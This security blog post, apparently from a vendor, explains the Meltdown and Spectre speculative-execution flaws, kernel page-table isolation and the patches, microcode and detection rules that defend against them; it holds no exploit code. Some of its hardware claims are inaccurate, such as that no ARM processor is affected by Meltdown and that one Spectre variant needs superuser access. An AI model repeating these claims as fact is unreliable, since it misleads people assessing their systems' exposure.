Exploits & Vulnerabilities
Understanding Meltdown and Spectre
After the official disclosure of the Meltdown and Spectre vulnerabilities, it became clear how serious the problems were. In short, Meltdown and Spectre both allow malicious code to read memory that they would normally not have permission to.
For several days, rumors circulated about a serious vulnerability in Intel processors. It wasn’t until January 3 that the official disclosure of the Meltdown and Spectre vulnerabilities was made, and it became clear how serious the problems were. To summarize, Meltdown and Spectre both allow malicious code to read memory that they would normally not have permission to.
The vulnerability can allow an attacker to steal information such as passwords, encryption keys, or essentially anything that the affected system has processed. Unfortunately, the desire to improve performance significantly compromised the existing security building blocks of mainstream operating systems (Windows, Linux, and Mac OS at least) that protect the privacy of user data. Proof of concept code for both attacks has been made public; no attacks are believed to have used these newly discovered vulnerabilities yet.
This post explains what these vulnerabilities are, how these vulnerabilities arose in the first place, and what vendors are doing to mitigate this threat.
Background: What is Memory Isolation
Memory virtualization is one of the basic security concepts in current operating systems. It brings memory isolation between user processes, ensuring one user cannot access and modify another user’s data. This is implemented with paging nowadays. There are large and complex kernel tree structures for each process called page tables (PT), describing the mapping between virtual and physical addresses and also defining access privileges. Supporting hardware called the memory management unit (MMU) in each modern CPU ensures this translation will be as efficient as possible. There are several layers of caches, called the translation lookaside buffer (TLB), that contain translation data. Each TLB miss leads to a time-consuming lookup in the PT hierarchy executed by the page fault trap handler.
Current operating systems like Windows, Linux, and macOS (including their mobile derivatives like Android and iOS) all use the same concept. Initially, it was expected that kernel privileged code and data would be mapped to the same virtual address of each process to simplify kernel code access to user data. Each change of virtual mapping (switching PT) usually leads to TLB flushing and is inevitable during process context switches. There was another reason for mapping kernel space to user virtual space – to reduce TLB misses when changing a virtual address mapping during the switch from user mode to the kernel code and back. This was so common that Intel recommended it as a best practice and allocated a single register to keep a pointer to the actual PT. This register is then expected to be populated during context switches. The ARM architecture, by contrast, has two PT pointer registers instead.
Kernel code/data is protected from direct access by user code with MMU access control. Many kinds of attacks have been discovered exploiting kernel code bugs, leading to privilege escalation and system control. To carry out these attacks, the attacker would need to know two things: what the vulnerability is, and what is the address of related kernel code and/or data.
To defend against this kind of attack, operating systems implemented address space layout randomization (ASLR) years ago. Specifically, in the case of the kernel, it is kernel ASLR (KASLR). Protection is based on keeping the addresses of kernel structures secret from user processes. There are many attacks against KASLR, some of which can be found here. Many of these attacks are based on measuring statistical differences between accessing memory when TLB is hit or missed; these statistics are based on the hardware implementation of the MMU and cannot be easily hidden.
In October 2017, researchers from Graz TU published a proposal to split the process PT into two. One is active when the process is executing kernel code (this is essentially the original PT). The second is a partial copy used for mapping user pages and some additional kernel pages needed for context switching, syscalls (OS system calls), and interrupt handling. The rest of kernel space is invisible; this PT is active when executing in user space. The kernel switches between these PTs when it is entering and exiting the syscall. This technique was called KAISER (Kernel Address Isolation to have Side-channels Efficiently Removed) and was able to defend against all known KASLR attacks with an added overhead of less than 1%.
Soon enough, work began to implement KAISER. In the Linux kernel, urgent (but silent) work began on a kernel page-table isolation (KPTI) implementation in November of 2017, which was based on KAISER. This part of the kernel is sporadically changed, with discussions taking place long before any code is written. Needless to say, the work to implement KPTI caught the attention of some observers because of its unusual nature.
Changes in this part of the kernel can have a significant impact on performance. Early tests showed a 5% impact in most cases, with worst-case tests indicating a 50% performance hit. On November 16, it became clear that something like KAISER was being implemented in Windows as well. The Linux KPTI was finally committed to the kernel on December 29.
Meltdown and Spectre
It soon became clear why KAISER was suddenly being implemented: it was an effective defense against Meltdown.
Both Meltdown and Spectre rely on security flaws in the speculative execution of CPU instructions. Modern processors are so fast that executing instructions in order one-by-one would lead to the CPU waiting for memory access, which takes several hundred clock cycles. Modern CPUs try to execute instructions that are ready for execution while waiting for memory read/write operations. It can be checked later if the instructions that were executed speculatively were correct; if the results are not needed, the effect on the CPU’s internal state and memory should be removed. This is called speculative execution and out of order execution.
Unfortunately, some side effects of speculative execution remain in the CPU’s state at low levels. For example, if there is an unsuccessful speculative move of a word from memory to a register at the end, the register contains the original value, but the cache is modified by the read cycle. The branch prediction logic buffers contain information about recently taken code branches. The researchers who discovered Meltdown and Spectre used low-level CPU states to gain access to protected memory regions using so called side channel information transfer.
Meltdown (CVE-2017-5754) allows an unprivileged user to access the complete kernel (and physical) memory of a computer. This attack is relatively simple to execute; to carry it out, attackers need to run their own program on the target system. This attack is particularly damaging to shared systems (such as cloud services), as an attacker with access to one virtual machine can use Meltdown to access other VMs on the same physical system. Meltdown is specific to Intel systems; AMD and ARM processors are not affected.
Spectre (CVE-2017-5753, CVE-2017-5715) is a broader vulnerability. Spectre relies on issues with speculative execution itself to be carried out. In its current form, the attack is more complicated as more prerequisites must be fulfilled. One of them is a code gadget, which must be found in a code shared by both victim and attacker. For some variants of this attack, a branch prediction CPU subsystem must be trained to redirect execution of a code to the selected gadget.
This makes exploitation highly dependent on the CPU version because prediction algorithms and deepness of the prediction buffers differs not only between vendors but across CPU generations. Two Spectre variants are currently known. One variant limits the attack to a single process space; the second requires superuser access. What makes Spectre particularly dangerous is the combination of kernel interpreters and JIT compilers like Linux eBPF which allows an attacker to create and run speculative executed code directly within the kernel context. This could have an impact similar to the Meltdown attack.
The real challenge with Spectre is its mitigation. Unlike Meltdown (which could be mitigated via patches to the operating system), Spectre requires changes to the hardware itself. As a workaround, some vulnerable code can be mitigated by inserting synchronization primitives (like the LFENCE instruction on Intel platforms) which effectively stops speculative execution. Another one is using return trampoline approach (Retpoline). This approach requires modification of compilers and careful selection of critical locations, which is non-trivial and cannot be easily done without human interaction; doing otherwise would impose a significant performance penalty.
All modern x86 processors from Intel and AMD, as well as some RISC chips based on ARM, Sparc, PowerPC architecture, are believed to be vulnerable. It makes mitigation of this vulnerability extremely costly, making it a long-term problem for the technology industry as a whole. Ball is now in the CPU vendors court. They will need to find a way how to keep high performance for their chips but at same time don’t ease on security. For sure a speculation algorithms must be changed. It is still an open question what can be done by microcode update and what needs a chip HW redesign.
Solutions and best practices
Mitigation must be done across different levels of the computer environment. CPU vendors are releasing microarchitecture updates which will be parts of system firmware. Operating system vendors are releasing kernel and compiler updates. Browsers are going to be patched as well to protect against Spectre. Users and system administrators should react promptly and install available updates to reduce the risk of a successful attack.
More software and firmware updates are about to come in the near future. Unfortunately, detection of an attack is extremely difficult. There are no other signs than on microarchitecture level or unusual system performance statistics like unusually high page fault rate or low cache hit ratio. There are no known malicious code samples for Meltdown and Spectre in the wild but it can change quickly as PoCs are coming out rapidly.
Microsoft has released documents that cover both server and client versions of Windows:
- Windows Server guidance to protect against speculative execution side-channel vulnerabilities
- Windows Client Guidance for IT Pros to protect against speculative execution side-channel vulnerabilities
Note that in order to receive automatic updates from Microsoft, a registry key must be in place on the affected system. Details can be found in this article.
Apple’s December updates for macOS (released last December 2017) already resolved the Meltdown vulnerability as well. As noted earlier, patches for Meltdown have been merged into the Linux kernel. It is up to individual vendors to release this update for their distribution; some vendors such as Debian, Red Hat, and SUSE have released bulletins and patches as appropriate.
While no attacks using these vulnerabilities are known to exist in the wild, several proofs of concept have been made publicly available. These are detected as TROJ64_CVE20175753.POC. In addition, Trend Micro™ Deep Security covers Spectre via the following DPI rule:
- Multiple CPU Spectre Attacks Detection (CVE-2017-5753 and CVE-2017-5715)
Similarly, Trend Micro Home Network Security covers both Meltdown and Spectre via the following signature:
- 1134349 WEB-CLIENT Multiple CPU Meltdown/Spectre Attacks Detection
Which CPU families are affected?
CISC architecture-based central processing units like Intel Core and AMD Ryzen have speculation and out of order execution optimizations logic implemented with hardware and microcode on a chip. On the other hand, processors with RISC architecture like Intel Itanium rely more on the compiler code generator for these types of optimizations. Some CPU families like ARM or IBM Power were formerly strictly RISC but used more CISC-like architecture elements over time and added complex execution pipeline with on-chip supported speculation logic. It is clear that mitigation of vulnerabilities in instruction optimization is much harder for HW-implemented solution. Generally, every CPU that features execution speculation is affected at least by Spectre. The difference is in the complexity of mitigation.
How to detect if your system is under attack
Each modern CPU supports the collection of many different performance counters of microarchitectural state changes. Observing these statistics can reveal Meldown and Spectre attacks. The theory for Intel platform using Processor Counter Monitor is described here. For example, deviations in cache miss, instruction retirement aborts or branch mispredictions can be detected during an attack. This is currently the most promising way to detect and abort attack code.
Intel releases CPU microcode update for Linux
Intel released a microcode update for all CPUs. Updates are usually part of computer firmware, but Intel released this update for Linux OS directly to speed up the microcode update distribution. It updates CPU microcode from the file stored in the root file system when the kernel starts.
Updated on January 11, 2018, 7:30 PM PST:
Virtualized environment
There has been a lot of questions on how to protect against speculation related vulnerabilities in a virtualized environment. On standalone operating systems, there is isolation between different processes as well as between the user and system space, ensured by the concept of virtual memory management as described above. Virtual machines managed by hypervisor are introducing another level of separation between different guests and between the host and guests.
CPUs today contain HW assisted support for virtualization. Intel, for example, has a special set of VMX instructions for easing hypervisors handling with VMs (and for enabling multi-level virtualization). It also features VT-x and VT-d technology to extend MMU virtual to physical mapping with support for virtualization. Intel did it by combining the guest PT with the host PT to increase the number of PT levels. This way, walking through the PT and TLB logic can remain the same, with just a small memory consumption overhead and slightly more time needed to walk through PT in case of a TLB miss.
Meltdown and Spectre speculation execution attacks can to cross over virtual space boundaries and avoid privilege level limitations to access kernel (and indirectly whole physical) memory. Unfortunately, it also applies to boundaries and privileges in a virtualized environment. Different guest or host memory can be accessed the same way different virtual memory or kernel space can be accessed.
In addition to updating microcode and installing all patches for guests and host operating systems, also hypervisor should be patched on virtualized environments.
Advisories for Vmware are VMSA-2018-0002.1 and VMSA-2018-0004.1. XEN advisory XSA-254 is here. RedHat related information for KVM based virtualization can be found here.
Updated on February 25, 2018, 6:30 PM PST:
Intel has released stable firmware updates that patch the microcode of Skylake, Kaby Lake, and Coffee Lake processors against the Spectre vulnerability. Updates for other Intel processors used in data center environments are also available. Details about these new updates are available from Intel. These fixes will be made available to end users in the form of BIOS updates, which will be provided by various PC and motherboard vendors as necessary.